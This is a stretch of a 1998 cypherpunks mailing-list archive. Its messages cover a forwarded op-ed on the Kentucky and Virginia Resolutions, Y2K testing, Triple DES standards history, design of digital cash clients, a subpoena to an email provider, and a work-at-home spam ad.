  President Adams's emissaries. Federalists were outraged; war
  fever swept the country. There were rumors that France was
  planning an invasion - and that Vice President Jefferson, whose
  Republican supporters were violently condemning the federal
  government, would join the invaders and overthrow the Adams
  administration.

     In this superheated atmosphere, Congress and the president
  enacted a package of grotesquely unconstitutional laws. The
  Alien Enemies Act empowered the president to jail or expel
  without trial any foreigner he deemed "dangerous to the peace."
  The Sedition Act prohibited all criticism of federal officials
  made "with intent to defame." Just seven years after the
  ratification of the First Amendment, editors, printers, and
  politicians were hauled into court and sent to prison for the
  crime of opposing the president.

     Jefferson and James Madison - who called the Sedition Act a
  "monster that must forever disgrace its parents" - resolved to
  strike back. Knowing that a Supreme Court fight would lose (the
  bench was dominated by Federalists), they decided to attack
  through the state legislatures.

     Working with allies in Kentucky and Virginia, Jefferson and
  Madison arranged for each state's general assembly to adopt a
  statement protesting the new laws. Jefferson drafted the
  Kentucky resolution, which was passed on Nov. 16, 1798. Madison
  wrote the Virginia resolution, which was adopted on Christmas
  Eve.

     "Resolved," the Kentucky Legislature declared in its opening
  paragraph, "that whensoever the General Government assumes
  undelegated powers, its acts are unauthoritative, void, and of
  no force." Supreme authority in America, it argued, was held
  not by the federal government but by the people and the states,
  and Congress and the president had only those powers clearly
  delegated to them by the Constitution. The Alien and Sedition
  Acts were intolerable above all because the federal government
  had no right to enact them. In the 20th century, the 10th
  Amendment has been largely ignored, but in the Kentucky
  Resolution, Jefferson quoted it repeatedly:

     "It is true as a general principle, and is also expressly
  declared by one of the amendments to the Constitution, that
  'the powers not delegated to the United States by the
  Constitution, nor prohibited to it by the States, are reserved
  to the States respectively, or to the people."' Nothing in the
  Constitution gave federal officials any right to interfere with
  freedom of speech or the press, or to exercise any jurisdiction
  over aliens. "Therefore, the act of Congress passed on the 14th
  day of July, 1798 ... is not law, but is altogether void, and
  of no effect."

     The Virginia Resolution was also blunt. Congress and the
  president, Madison wrote, have only the powers "enumerated in
  that compact [the Constitution]; and that in case of a
  deliberate, palpable, and dangerous exercise of other powers
  not granted by the said compact, the states ... have the right
  and are duty bound to interpose for arresting the progress of
  the evil."

     These resolutions weren't empty theory. They were a forceful
  defense of freedom, and a reminder that when governments are
  allowed to infringe the liberty of A, it is only a matter of
  time before they move on to B's.

     "The friendless alien has indeed been selected as the safest
  subject of a first experiment," declared the Kentucky
  resolution, "but the citizen will soon follow - or rather has
  already followed, for already has a Sedition Act marked him as
  its prey."

     Jefferson and Madison were fearful, as more Americans should
  be today, of allowing power to be concentrated in the central
  government. They won the battle: Americans came to hate the
  Alien and Sedition Acts, and the Federalists were thrown out in
  the election of 1800. But did they win the war? In our day, the
  federal government has grown monstrous, strangling Americans'
  freedom through endless regulations, restrictions, and taxes.
  The bicentennial of the Kentucky and Virginia Resolutions
  reminds us how much we have lost - and points the way to win it
  back.

  Jeff Jacoby is a Globe columnist. You can write Jeff at
  Jacoby@globe.com.


  * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  NOTE: In accordance with Title 17 U.S.C. section 107, this
  material is distributed without profit or payment to those who
  have expressed a prior interest in receiving this information
  for non-profit research and educational purposes only. For more
  information go to:
          http://www.law.cornell.edu/uscode/17/107.shtml
  * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
      "The Only Alternative to Limited Taxation and Government
                is Unlimited Taxation and Government"

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "X" <xasper8d@lobo.net>
Date: Wed, 30 Dec 1998 08:36:16 +0800
Subject: cookie sniffers?
In-Reply-To: <36894498.7418B40@netcomuk.co.uk>
Message-ID: <002901be3376$30aaa5c0$03000004@ibm>
MIME-Version: 1.0
Content-Type: text/plain



While you register for a hotmail acct., do they sniff around to see who you
really are?

Or is it anon?

X




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jeradonah@juno.com (jeradonah lives)
Date: Wed, 30 Dec 1998 04:49:11 +0800
To: bill.stewart@pobox.com
Subject: Re: distribution scheme
In-Reply-To: <3.0.5.32.19981228010513.008cc410@idiom.com>
Message-ID: <19981229.150928.4551.1.jeradonah@juno.com>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 28 Dec 1998 01:05:13 -0800 Bill Stewart <bill.stewart@pobox.com>
writes:
>Falcon, aka FitugMix, wrote about a suggestion to chop crypto or other 
>contraband material into separate streams, e.g. bit 1 of each byte in 
>stream 1, etc., hoping that this would be "legal" because it's not
really 
>encryption, though if managed carefully it would still be hard to read.

this concept is virtually identical to fractal encryption, where a
message is chopped into its component parts (25 a's, 3 b's, 8 c's, and so
on) and also chopped into a configuration scheme.  this form of
encryption does fall under the definition of munitions by the u.s.
government...

ac








___________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com/getjuno.html
or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Wed, 30 Dec 1998 00:36:31 +0800
To: "Reeza!" <howree@cable.navy.mil>
Subject: Re: SNET: United Nations plans SWAT team training to "control" citizens in Y2K crash
In-Reply-To: <199812290802.AAA28246@netcom13.netcom.com>
Message-ID: <3688FB23.F6F3FA0D@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Reeza! wrote:
> 
> At 10:15 AM 12/29/98 +0100, Mok-Kong Shen wrote:
> --snip of magnanimous import--
> >
> >Is is (approximately) known how many percent of the owners of computer
> >systems have ever tried with some test cases to find out whether
> >their hardware/software could be susceptible to the Y2K problem?
> >I guess such tests would deliver some confidence intervals of
> >whether the problem could actually arise at 2000.
> >
> 
> What, you trying to downplay the tumult and ? that y2k will cause??? the
> fearmongerers will not be happy with you. They want everyone to be begging
> them for mercy, safety, deliverance from the y2k bug.
> 
> What? you say consumers should actually test their own shit? You forgot to
> mention the outside consultants who should be brought in at xyz dollars per
> hour. To think that Joel and Janice Consumer might actually be able to test
> their own equipment for y2k compliance.
> 
> y2k is coming, or else!!! (read, it will be manufactured if it does not
> eventualize itself).

In WHICH word I wrote I was downplaying???  I think you are up-playing!
Are you a consultant, desiring to earn money? If not, then try
to keep discussion to real matters of the problem.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pallas Anonymous Remailer <athena@cyberpass.net>
Date: Wed, 30 Dec 1998 09:56:05 +0800
To: cypherpunks@cyberpass.net
Subject: STUDENTS WEB SITE COVERED BY THE RIGHT OF FREE SPEECH
Message-ID: <4fc6b9e3f0c97c1da3b0d3a1abcf1da9@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



A federal judge has ruled against the school district of a Missouri high
school student suspended because he and his sister posted a personal Web
page using vulgar language to criticize the school's official Web site.
U.S. District Court Judge Rodney Sippel has issued a preliminary injunction
barring the school district from suspending the student, punishing him, or
restricting his ability to post his personal home page. Sippel's opinion
asserts:  "Dislike or being upset by the content of a student's speech is
not an acceptable justification for limiting student speech."  

(AP 28 Dec 98)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Wed, 30 Dec 1998 02:37:53 +0800
To: "Reeza!" <howree@cable.navy.mil>
Subject: Re: SNET: United Nations plans SWAT team training to "control" citizens in Y2K crash
In-Reply-To: <199812290802.AAA28246@netcom13.netcom.com>
Message-ID: <36891A04.3CAA067F@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Reeza! wrote:

> Sorry, yes I am up-playing, for the sake of humor. No, I'm not a
> consultant, Yes I desire to earn money, and the real problem (as I see it)
> isn't with the hardware or software, it is with what people will do.
> Regardless of anything relevant or irrelevant, what the sheeple think can
> happen, what they see happen, what really does happen and how some of them
> will over-react to it.
> 
> All the Gov't's making plans for martial law is an enormous alarm going off
> in my head,,,,

What I guess is very bad currently is that plenty of owners of the 
computer systems appear to be shy of facing squarely with the
problem and of conducting some direct tests to get at least some
real feeling of the problem that quite probably may occur. (It's
like one is not inclined to consult the doctors until the illness
becomes very grave. Certainly this is only my superficial observation. 
I may be very wrong.) Of course, such tests, if not well designed, 
may not deliver the hoped-for results. But having the courage to do 
some tests is anyway better than to avoid considering the problem 
till the day when Y2K really hurts. I am ignorant of how hard it 
is indeed to devise some realistic tests for Y2K. On the other hand, 
I can't imagine that these could be anything terribly difficult. 
If there are huge data bases involved, one could copy a part to a 
separate hardware and do experiments with it by entering data of 
Y2K and manipulating the system clock. If nothing happens, then 
one gains at least some assurance and can proceed to do more 
sophisticated tests. If something goes wrong, one knows directly 
what kind of misery one could expect to have at 2000 if the problem 
is ignored today and can thus energetically look for the remedy.
I speculate that most firms can start to do some tests with their
own staffs, i.e. without external consultants.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 30 Dec 1998 09:53:16 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: CLT&G Update: 29 Dec 98 (fwd)
Message-ID: <199812300141.TAA03820@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 29 Dec 1998 14:57:08 -0500
> From: Robert Hettinga <rah@shipwright.com>
> Subject: CLT&G Update: 29 Dec 98

>      Jefferson and Madison were fearful, as more Americans should
>   be today, of allowing power to be concentrated in the central
>   government.

The entire point of a consitutional democracy is to avoid centralization.
A better way to word this is that we should be afraid of the federal
government becoming the central government.


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stu Green <stugreen@realtime.net>
Date: Wed, 30 Dec 1998 04:21:14 +0800
To: alg <cypherpunks@einstein.ssz.com
Subject: THE REGISTER [Relaxation Of Encryption Export Constraints (Not really, but better than Wassenau)  -  Stu]
Message-ID: <368933D9.4E56E82E@realtime.net>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stu Green <stugreen@realtime.net>
Date: Wed, 30 Dec 1998 04:33:46 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: THE REGISTER [I bin einer Noski, Tooski   -  Stu]
Message-ID: <36893454.1958EBC@realtime.net>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stu Green <stugreen@realtime.net>
Date: Wed, 30 Dec 1998 04:44:16 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Culture News from Wired News [news From The Chaos Communications Congress (Berlin)    -  Stu]
Message-ID: <36893921.6ACE44F8@realtime.net>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: whiterose@liveinfreedomor.die
Date: Wed, 30 Dec 1998 09:40:02 +0800
To: cypherpunks@cyberpass.net
Subject: QuickEmail, A Web-based E-mail message
Message-ID: <199812300118.UAA07523@sol00371.dn.net>
MIME-Version: 1.0
Content-Type: text/plain



SSA, IRS, VA A-OK FOR Y2K

President Clinton says that the U.S. Treasury Financial Management System
has completed testing by independent auditors and is now "certified as Y2K
(Year 2000) compliant."  The Y2K problem or "millennium bug" is found in
old programs that (because their authors used only two rather than four digits
to designate years) will make mistakes when doing calculations based on
dates.  The Social Security Administration has led the way in dealing with
the Y2K problem, which it first started working on in 1989.  


(San Jose Mercury News 29 Dec 98)












A service provided by TechAID Computer Services, http://www.techaid.net
The e-mail address of the sender MAY NOT BE AUTHENTIC.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 30 Dec 1998 10:42:40 +0800
To: cypherpunks@cyberpass.net
Subject: Hoppe on Defense
Message-ID: <v04020aa7b2af3b254469@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: "Mises Institute News" <news@mises.org>
To: <miseslist@mises.org>
Subject: Hoppe on Defense
Date: Tue, 29 Dec 1998 14:53:24 -0600
Sender: miseslist-owner@mises.org
Status: U

We are pleased to announce another paper in our Essays in Political
Economy series:

"The Private Production of Defense" by Hans-Hermann Hoppe (Professor of
Economics, University of Nevada, Las Vegas; Senior Fellow, the Ludwig von
Mises Institute).

>From the essay:

"Among the most popular and consequential beliefs of our age is the belief
in collective security. Nothing less significant than the legitimacy of the
modern state rests on this belief. And yet, the idea of a collective
security is a myth that provides no justification for the modern state.
Private-property owners, cooperation based on the division of labor, and
market competition can and should provide defense from aggression."

This powerful and radical essay can be purchased here

http://mises.org/product.asp?sku=p131

or by calling 334-844-2500.

The price is $4.00 postpaid (no postage charges will appear on your credit
card, regardless of what your shopping basket says).

* * * * *

A special 4-page, supplemental Austrian Economics Newsletter has been
published this quarter. It features an interview with Roberta Modugno of the
Center for the Methodology of the Social Sciences at the Libera Universita
Internazionale degli Studi Sociali in Rome, Italy. She discusses her new
book, Murray N. Rothbard e il libertarismo amerciano (Robbettino Ediotre,
Soveria Mannelli, 1998).

Students and faculty have been mailed a copy of this special AEN. If you are
not on the list to receive one, email susan@mises.org with your address.
Subscriptions to the AEN are $16 a year.

Something to look forward to for Spring 1999: An interview With Richard
Vedder (Ohio University)

* * * * *

The new Mises Review features David Gordon reviewing books by Allen Oakley
on Austrian economics; Francis Beckwith and Gregory Koukl on relativism;
Richard John Neuhaus et al. on judicial tyranny; Zbegniew Brzezinksi on
American foreign policy; Jim Sleeper on liberal racism; Michael Levin on
race; and Ronald Dworkin on affirmative action.

Individual copies are $5. Subscriptions are $16 per year. Back issues are
available on Mises.org.

Subscribe: http://mises.org/product.asp?sku=MR

* * * * *
As we approach the new year, we wish you a happy one, and hope you enjoy
Clifford F. Thies's article on millennial hysteria and its historic
connection with socialist ideology.

http://mises.org/fullstory.asp?FS=+%3Ch3%3EThe+Year+2000

In the next few days on Mises.org, we'll feature an article on the Euro and
coverage of the continuing debate between Robert Bork (taking the statist
position) and Michael Kinsley (taking the free-market position) on
Microsoft's future. It may seem like a strange turnabout, but even stranger
things have happened this month, in addition to the political turmoil in the
Belly of the Beast: the Mises Institute and the Village Voice agreed-that
the U.S. government should not be destroying people and property in Iraq.

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Calumn Shearer <calumn@netcomuk.co.uk>
Date: Wed, 30 Dec 1998 05:55:29 +0800
To: FGSlist@listbot.com
Subject: [Fwd: Seasons Greetings [Ref: 42057]]
Message-ID: <36894498.7418B40@netcomuk.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Taking confidentiality to an extreme.....
Apparently, micro$oft are giving out christmas wishes on a "need to know"
basis.


OEMNews <OEMNews@microsoft-contact.co.uk> wrote:

> Dear  Calumn Shearer
>
> __________________________________________________________________
>
> The Microsoft System Builder team would like to wish you a very happy
> Christmas and a successful 1999.
>
> __________________________________________________________________
> >>  CONFIDENTIALITY NOTICE <<
> The information contained in this email is proprietary and confidential,
> and
> is intended only for users of the Microsoft OEM Web site as
> "confidential
> information" under your Web Site Registration and License Agreement.
> If you (or your company) are not licensed to use the Web site, then any
> use, copying, and distribution of information contained in this message
> is
> strictly prohibited.
> If you received this message in error, please immediately notify us by
> sending email
> to msoemnet@microsoft.com.
> (c) 1998 Microsoft Corporation.  All rights reserved.
> Microsoft and Windows NT are either registered trademarks or trademarks
> of Microsoft Corporation
> in the United States and/or other countries.
> Microsoft OEM products are licensed to system builders by Microsoft
> Licensing, Inc., a wholly owned
> subsidiary of Microsoft Corporation.
> This email is provided for informational purposes only.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 30 Dec 1998 11:21:22 +0800
To: cypherpunks@cyberpass.net
Subject: Fwd: trigger locks on public weapons
Message-ID: <v04020aacb2af406981bb@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Tue, 29 Dec 1998 17:23:38 -0800
To: rah@shipwright.com
From: Vinnie Moscaritolo <vinnie@vmeng.com>
Subject: Fwd: trigger locks on public weapons

> Date: Tue, 29 Dec 1998 17:22:51 -0800
> To: staff@goal.org
> From: Vinnie Moscaritolo <vinnie@vmeng.com>
> Subject: trigger locks on public weapons
> Cc:
> Bcc:
> X-Attachments:
>
> congratulations on your move to force the MA legislators to eat their
> dogfood by placing trigger locks on the Besses in the state house.. I am
> an ex resident of the People's Democratik Socialist Commonwealth of
> Massachusetts and was recently visiting the Rude bridge in Concord,
> showing my wife the very place where America started.  I happened to
> visit the museum at the bridge and noticed that that there were three
> functional Brown Besses in display, and non of them were properly locked.
> I was appalled to see this, after all this is a place where many visitors
> come to see where freedom started, where the Colonists stood against the
> king who only wished to protect them by confiscating their guns.. and to
> find that the weapons displayed there were did not comply with the law of
> the day quite dismayed me.. but I thought that if I informed the folks at
> GOAL you might be able to contact the propler authorities and set things
> straight..
>
> good luck my brothers..


Vinnie Moscaritolo
http://www.vmeng.com/vinnie/
Fingerprint: 3F903472C3AF622D5D918D9BD8B100090B3EF042
-------------------------------------------------------

Those who hammer their swords into plows,
will plow for those who don't."

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Wed, 30 Dec 1998 10:54:57 +0800
To: cypherpunks@cyberpass.net
Subject: [EFGA] DragonCon.net Receives Subpoena for User Records
Message-ID: <3.0.3.32.19981229212943.041d9718@rboc.net>
MIME-Version: 1.0
Content-Type: text/plain



Date: Tue, 29 Dec 1998 17:02:48 -0500
To: announce@efga.org
From: "Robert A. Costner" <pooh@efga.org>
Subject: [EFGA] DragonCon.net Receives Subpoena for User Records
Sender: owner-announce@efga.org
Reply-To: owner-announce@efga.org
X-URL: http://www.efga.org

    DRAGONCON.NET RECEIVES SUBPOENA FOR USER RECORDS

This week DragonCon.net, a free email service, received a Subpoena
requesting information on one of its users including

    the true and correct legal name, IP addresses, E-mail addresses, 
    E-mail headers and postal address

The matter has been referred to attorneys to see if the Subpoena is valid
and should be complied with.  DragonCon.net places a high value on the
privacy of it's users and will not release user info based on a casual
request.

http://www.dragoncon.net is a privacy friendly email forwarding and
newsgroup posting service using technology developed by Electronic
Frontiers Georgia (EFGA) <http://www.efga.org>.  EFGA is known for it's
leadership in the worldwide anonymous remailer community, the Georgia
Cracker remailer <http://anon.efga.org>, and as the original plaintiff in
the internet anonymity case ACLU vs. Miller.  DragonCon.net has been a way
to extend a form of privacy and anonymity to those who wish for some
anonymity in communications without the burden of encryption imposed by the
Cypherpunk remailer system.

Dragon*Con <http://www.dragoncon.org> is a science fiction and fantasy
convention held each year in Atlanta, Georgia.  DragonCon.net is a free
email service for members of Dragon*Con which also allows anyone else to
have an email account.  DragonCon.net, the email service, is operated
independently of Dragon*Con by a third party company.  Says Chairman Ed
Kramer of Dragon*Con, "Dragoncon.net is run by an independent company; we
have no control over their policies.  However, we certainly respect the
privacy of our members and support the pro-privacy polices of the internet
service towards their users.  We've been told that attorneys are reviewing
irregularities in the subpoena, and the internet service may be forced to
not honor it."

The matter is a civil action against a group of email-name defendants, none
of which appear to be the Dragoncon.net user.  Dragoncon.net is not a party
in the suit.  We do not yet know the nature of the civil action.  More
information will be announced in a few days.

For more information contact 

  Robert A. Costner
  pooh@efga.org
  770 402-3580

*
To join or be removed from this list, send a message to majordomo@efga.org
with
the message body of SUBSCRIBE announce or UNSUBSCRIBE announce




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <ryan@venona.com>
Date: Wed, 30 Dec 1998 10:02:48 +0800
To: pecunia@venona.org
Subject: Re: "Hit 'em Where They Ain't": Deploying Digital Bearer Transactions
In-Reply-To: <v04020a99b2aeb1bef49c@[139.167.130.246]>
Message-ID: <19981229213622.L344@arianrhod.@>
MIME-Version: 1.0
Content-Type: text/plain



[BTW, there's a new mailing list to discuss how technical implementation
details of DBS would [hypothetically] affect market dynamics, user
experience, etc. -- send mail to pecunia-request@venona.org if interest.
It's for stuff a bit too technical for dbs, and stuff too tenuously
connected to cryptography for a mailing list like cryptography or coderpunks.]


Quoting Todd Boyle (tboyle@rosehill.net):

> Much hot air has been expended on directions in which accounting systems
> will be re-architected for the internet. Meanwhile Quickbooks continues past
> 90% and up, in small and medium sized businesses.  It has got the user
> interface solved, among many other problems. There is no possibility anybody
> will take away the Quickbooks market in the next 3-5 years. I hate this.
> But it's reality.

> [suggestion: integrate electronic cash clients into Quickbooks]

The same argument could be made for integration with the successful
shopping cart systems (for retail purchasing), the successful web server
(apache, maybe netscape and ms iis if you are feeling charitable), the
popular internet client platform (netscape or maybe msie).

I believe in this theory to an extent.  Unfortunately, it seems easier to
develop a platform-independent client for a DBS system first in standalone
mode, then work on integrating into various existing applications.

* Development and testing tools for generic systems such as Java are generally
far superior to those for closed systems

* A development team experienced in the other details of a payment system
(cryptography, network protocols, security) is more likely to be familiar
with generic software development than with developing for a specific
application

* Debugging a standalone client is generally far easier than debugging a
plugin for an application which may itself have bugs.

* Disagreements as to which particular proprietary systems should be supported.
While Quickbooks, for instance, may control the business accounting market,
packages such as quicken are more entrenched for individual (and perhaps 
very small business), and very large corporations use different packages.
Which market segment, even for just accounting, should be the target?

* The risk that a proprietary vendor will change the interface on the
development team partway through development, or will go out of business,
or become less important in the marketplace -- this is more of an issue
the longer the product development cycle is.

* Substantial minorities who are very attached to particular tools, in
contrast to the majority of the target market -- witness the macintosh
minority.  This is because of the interface, legacy plugins, or whatever,
and basically needs to be taken as a given.

Looking at another popular crypto application which I believe had considered
this issue is PGP.  The core functionality of PGP, especially until
relatively recently, has been to send encrypted email messages.  A
fairly compelling number of users use a small number of mail programs
(Eudora, maybe Netscape Mail, maybe MS Exchange/Outlook).  However, PGP chose
to develop and continue developing a standaline application, leaving it
to third parties to integrate PGP with existing mail readers.

One logic would have said PGP should have created a standalone mail program,
subsuming whatever functionality a tool like Eudora offers.  There are a
few reasons this might be worthwhile -- easier integration for the user
by virtue of only having a single tool to use, both in configuration and
in daily use -- perhaps market reasons such as greater profits -- greater
brand identity -- assurances of secure behavior by the underlying levels
(since they're integrated into the applications).

However, there are many reasons subsuming the mailer functionality into
the security application doesn't make sense.  First of all, it was not
necessarily known that electronic mail would be such a compelling application
for PGP (well, actually it was).  Additionally, they rightly noted that people
would be reluctant to leave their existing mail programs (additionally,
the market was a bit more fractioned at the time).  There were the same
problems with integrating into multiple applications, and also I don't
think Phil Z. or the other early PGP developers had much experience
developing application-plug-ins for any of the major mail clients.

There are probably other factors involved here which I haven't addressed.

My take on the question of how to do clients is that one should first
develop functional standalone clients, with a well defined API, then
either find existing people doing plug-ins or third-party applications
and get them to do the integration work (keeping the code in the main
line of the application, if possible, to keep it compatible with the latest
releases of the product).  Additionally, in some cases there exist
wide-ranging standards which are easy to implement (such as the UNIX
standards for stdin/stdout and argument handling, or perhaps HTTP/HTML,
or maybe at some point XML or OFX) which should be implemented.  There
are also some applications which are so widespread that their own internal
interface standard, if well documented and relatively unchanging, is worth
writing to -- perhaps this is the case for browser plug-ins for Netscape
and MS IE, perhaps for MS Office add-ons, and maybe the case for Eudora.
However, in most of these cases, I'd be much happier writing a standalone
system first, getting most of the development process out of the way,
then doing a shorter development cycle to integrate the well-tested
codebase into a third-party application...this lowers the window of risk
for changes in the third party application as well as providing the above
advantages.

In the long run, though, I agree that integrating DBS into existing accounting
systems at least as well as current payment systems, and probably far
better, is of very high importance.  I wasn't aware quickbooks was that
popular, and will look at it soon...it sounds like it would be an interesting
package to work with.

Happy New Years,
Ryan
ryan@venona.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 30 Dec 1998 11:35:38 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Triple DES "standard"?
Message-ID: <v04020ab1b2af424df3c8@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Tue, 29 Dec 1998 19:11:37 -0500
To: jehill@nexis.org
From: Vin McLellan <vin@shore.net>
Subject: Re: Triple DES "standard"?
Cc: Rodney Thayer <rodney@tillerman.nu>, Cryptography@C2.net
Sender: owner-coderpunks@toad.com

Rodney Thayer reported:

>> Curiously enough, there seem to be no references to a standard before
>> the X9.52 effort,  which appears to be only a year or two old.  NIST calls
>> Triple DES a "private" standard.

Josh Hill <jehill@nexis.org> responded variously:

>?

>Before things become standards, they are just good ideas.  Triple DES is
>widely used, despite the fact that there is no absolute standard.  The
>draft standard, itself, is actually quite straight forward... Nothing
>really interesting about it, aside from ANSI's blessing.

>NIST does the "we'll just refer to another standard and call it ours"
>thing a fair bit... Look at FIPS 186-1: The RSA signature scheme accepted
>is the one specified in ANSI X9.31.

	Actually, as I recall the tale, the Amercian Bankers
Association-sponsored ANSI-accredited X.9 Committee's blessing of DES3 was
itself pretty interesting.

	I understood that the NSA lobbied bitterly against the X9 effort to
standardize 3DES as an ANSI standard, insisting that DES would surfice
until its successor was chosen.

	A couple years ago, when the X9 committee -- or maybe one of the X9
crypto subcommittees -- rejected that advice and initially recommended that
3DES be made a standard, I was told that the NSA rep angrily declared that
3DES would _never_ get an export license and would never be shipped
overseas. (Which may have put a damper on the 3DES standardization
effort;-)

	Unfortunately, these standards development efforts usually escape
the media's attention. Anyone on the list active in X9 and can give us the
real story?

	Since the birth of X9 in the late 70s, the US National Security
Agency has its own representative on the X9 Committee.  As one might
expect, the NSA has traditionally had significant influence over the ANSI
"F" (crypto) subcommittees and cryptographic standards in financial
services. There was a time when Ft. Meade effectively dictated those
standards. Now, that is not necessarily so....

	(After the NSA blundered so badly in trying to force the Banking
industry to switch from DES to CCEP/Clipper in the late 80s, the Agency's
mesmerizing control broken. The initial intro of CCEP/Clipper -- at an ABA
meeting -- proposed that only US owned institutions could have access to
Clipper.  At the time, as I recall, maybe 10-15 percent of the US banks
were foreign owned;-) The bankers couldn't believe that these idiots --
obviously so ignorant about the workings of the industry they were trying
to defacto regulate -- were from the NSA of Legend and Lore.)

	I always felt that the NSA's alienation of the Bankers was probably
the single most important factor in the collapse of the government's Cipper
campaign.

	Suerte,
		_Vin



-----
      Vin McLellan + The Privacy Guild + <vin@shore.net>
  53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548
                         -- <@><@> --

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Death46760@aol.com
Date: Wed, 30 Dec 1998 12:54:49 +0800
Subject: !! Wanted Home Product Assemblers !!
Message-ID: <e23ac0f.368992e4@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



*****This is a one time Mailing.  You will not receive mail from us
again.*****

Looking for Home Product Assemblers!!  How would you like to Assemble Products
at Home & get Paid!  Choose your own Hours!  Be your own Boss!  Easy Work!
Excellent Pay!  Earn Hundreds of Dollars Weekly!  Here are just a few examples
of the work you will have to choose from:

Wooden Products - up to $220.00 Weekly!
Hair Accessories - up to $320.00 Weekly!
Holiday Crafts - up to $270.00 Weekly!
Beaded Accessories - up to $350.00 Weekly!

........Plus many others.  There are over 75 Companies to choose from!  Why
not enjoy the Benefits and Freedom of Home Assembly Work!  To find out more
Call.....Toll Free (24 Hour Recording) 1-888-289-9708.

U.S. Publishing Co.
P.O. Box 633
Rocky Mount NC  27802

Name

___________________________________________

Address

___________________________________________

City & State

___________________________________________ 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Tue, 29 Dec 1998 21:19:05 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Kha0s Linux Distribution
In-Reply-To: <199812290233.UAA28178@wire.insync.net>
Message-ID: <3.0.5.32.19981229225348.0098d340@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 08:33 PM 12/28/98 -0600, Eric Cordian wrote:
>>From the webpage at Kha0s.org:
> 
>> Expect the first beta release of kha0S to include Matt
>> Blaze's CFS. It has been around for a while and has had
>> the benefit of review by the cryptographic community.
> 
>A good start, I guess.  
>

A better start would be a URL for download,,,, 
having no applicable background I can only wonder what I might be able to
